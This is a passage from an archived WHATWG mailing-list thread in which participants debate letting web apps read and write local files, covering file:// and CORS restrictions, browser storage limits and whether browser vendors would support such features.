as that is limited to a total of 5MB or even less in most browsers, 30+
samples easily consumes that.
You may want to check again. An origin typically gets an order of magnitude
more storage than that for Indexed DB across browsers and devices.
The ideal here is to make a html soundboard app locally (i.e file://)
then
copy it as is to a webserver. Users can either use it from there (http://
or https:// online and/or offline) or "Save As" the document and use it
locally (file://) for preservation or offline use without server
dependency.
The only way to make this work currently is to make the user hand write
the path (full or relative) to each sound and store that in localStorage
along with volume and fade in/out.
But fade in and out is "faked" by adjusting the <audio> volume as CORS
prevents processing the audio and doing a proper crossfade between sounds
which is possible but locked down due to CORS.
I can understand limitations due to security concerns, but arbitrary
limitations to functionality baffles me.
I do not see much difference between file:// http(s):// besides one
allowing serverside data processing and http headers, but these days most
apps are entirely clientside. A sample editor can be written that is
fully
clientside, even including mic recording normalizing, FX, the server is
not
involved in any stage except delivering the .html file + a few lines of
headers. The web app itself is identical (i.e. hash/checksum identical)
be
The benefit is that "the app is the source code" which is a ideal goal of
open source as anyone can review and copy and modify as they please.
And in theory it could run just as well truly offline/standalone as it
could online without the need for a local webserver or similar.
I'd dare say that thinking of a web app as something hosted only from a
server via http(s) is a antiquated idea.
These days a "web" app can be hosted via anything, want to open a webapp
that is served from a cloud storage like Dropbox? Not a problem.
Well, almost not a problem. a cloud storage probably do not have the
proper CORS header to allow a sample editor to process sound from local
files or files stored on a different cloud service.
And a soundboard or a sample editor is just two examples, a image or
video
edit would have similar issues. OR what about a game with mod support?
Being able to drag'n'drop a mod onto a game and then have the game load
it
the next time you start the game would be a huge benefit.
But currently this can not be done, the mod would have to be uploaded to
the server the game is served from, even if the game itself does not use
or
need any serverside scripting.
Or imagine a medical app that needs to read in CSV data, such a app could
work fully offline/local and load up the data each time it's started.
Storing the data in localstorage/indexDB would be limited to whatever
else
is stored as far as size goes, and browsers can just wipe the local
storage/indexDB without warning. At least a local file stored on d:\docs\
is safe from vanishing.
Even if the app itself is online and served from a server you still can't
have it load a list.CSV from d:\docs\ when starting it for example. And
IndexDB/localStorage is limited to around 5MB total for that domain.
Maybe
there is a desire to switch between datasets list1.csv and list2.csv and
list3.csv and before you know it you open xray.png enhance a area and
save
that change (in localStorage as you can save the path and a zoomvalue you
have to save the entire image instead) and suddenly list1.csv get deleted
One of the ideas you're highlighting here is around allowing web apps to
access local files in a read/write fashion, possibly in a persistent way.
https://github.com/WICG/writable-files
....
On the topic of file:// behavior - the history of support in browsers is
instructional here. Early browsers (naively) assumed that local content
could be fully trusted, more so than content served over HTTP (think IE
security zones). As the web security model has evolved, the capabilities
granted to file:// content has become more and more restricted over the
years. I expect that trend to continue rather than reverse.
--
Unless specified otherwise, anything I write publicly is considered
Public
Domain (CC0).
Roger Hågensen,
Freelancer, Norway.
Anne van Kesteren
2017-04-20 07:59:48 UTC
Permalink
Post by Yay295
Maybe a solution then would be to provide a way to request more storage
space?
Sounds like it. At least in Firefox https://storage.spec.whatwg.org/
will provide that soonish, including the guarantee that the browser
won't remove your application data unless the user asks it to do so.

(This is why it's always good to start with use cases, examples, and
general problem descriptions, before delving into specific solutions
that may or may not solve the problem.)
--
https://annevankesteren.nl/
Richard Maher
2017-04-18 22:36:20 UTC
Permalink
Post by Ian Hickson
The main thing that seems to be missing from this thread is any commitment
from any browser vendors to actually support any changes in this space.
It has been my experience that browser vendors, more often than not, require at least a (proposed) standard before they will consider implementing a requested feature.

While I personally find the inordinate level of effort and debate that goes into off-line first functionality frustrating, I would certainly not seek to stifle debate or censor someone else from having their say.

Background geolocation can work via service workers for fleet-management even in the complete absence of an instantiated UA and definitely requires the WWW to function but then I’m all for Web functionality and network connectivity and IoT and so on.
Ian Hickson
2017-04-18 22:46:46 UTC
Permalink
Post by Ian Hickson
Post by Ian Hickson
The main thing that seems to be missing from this thread is any
commitment
Post by Ian Hickson
from any browser vendors to actually support any changes in this space.
It has been my experience that browser vendors, more often than not,
require at least a (proposed) standard before they will consider
implementing a requested feature.
That's a different question. I was saying we should make sure the browser
vendors care about this space at all. Requesting a specific feature be
implemented comes much later, after use case collection and API design
stages.

If the browser vendors feel like this is out of scope for their product,
then spending the (quite extensive) effort to design a solution will be
wasted. I wouldn't want anyone on this list to feel their time is wasted.


I would certainly not seek to stifle debate or censor someone else from
Post by Ian Hickson
having their say.
Indeed not! I should hope nobody would feel that way. The WHATWG is a venue
that is open to anyone willing to take part in relevant technical debate.
--
--
Ian Hickson

😸
Richard Maher
2017-04-18 22:58:57 UTC
Permalink
If the browser vendors feel like this is out of scope for their product, then spending the (quite extensive)
effort to design a solution will be wasted. I > wouldn't want anyone on this list to feel their time is wasted.
I also do not like to see W3C’s valuable time continually wasted on specifying functionality that has expressly been dismissed by major browser vendors. For example: -

https://www.w3.org/TR/geofencing/
and
https://bugs.chromium.org/p/chromium/issues/detail?id=383125#c46
Indeed not! I should hope nobody would feel that way. The WHATWG is a venue
that is open to anyone willing to take part in relevant technical debate.
Then please stop censoring my posts or manufacturing chicken-and-egg pre-requisites for topics you are not interested in.


From: Ian Hickson [mailto:***@hixie.ch]
Sent: Wednesday, April 19, 2017 6:47 AM
To: Richard Maher; ***@whatwg.org
Subject: Re: [whatwg] Accessing local files with JavaScript portably and securely
The main thing that seems to be missing from this thread is any commitment
from any browser vendors to actually support any changes in this space.
It has been my experience that browser vendors, more often than not, require at least a (proposed) standard before they will consider implementing a requested feature.

That's a different question. I was saying we should make sure the browser vendors care about this space at all. Requesting a specific feature be implemented comes much later, after use case collection and API design stages.

If the browser vendors feel like this is out of scope for their product, then spending the (quite extensive) effort to design a solution will be wasted. I wouldn't want anyone on this list to feel their time is wasted.


I would certainly not seek to stifle debate or censor someone else from having their say.

Indeed not! I should hope nobody would feel that way. The WHATWG is a venue that is open to anyone willing to take part in relevant technical debate.
--
--
Ian Hickson

😸
Loading...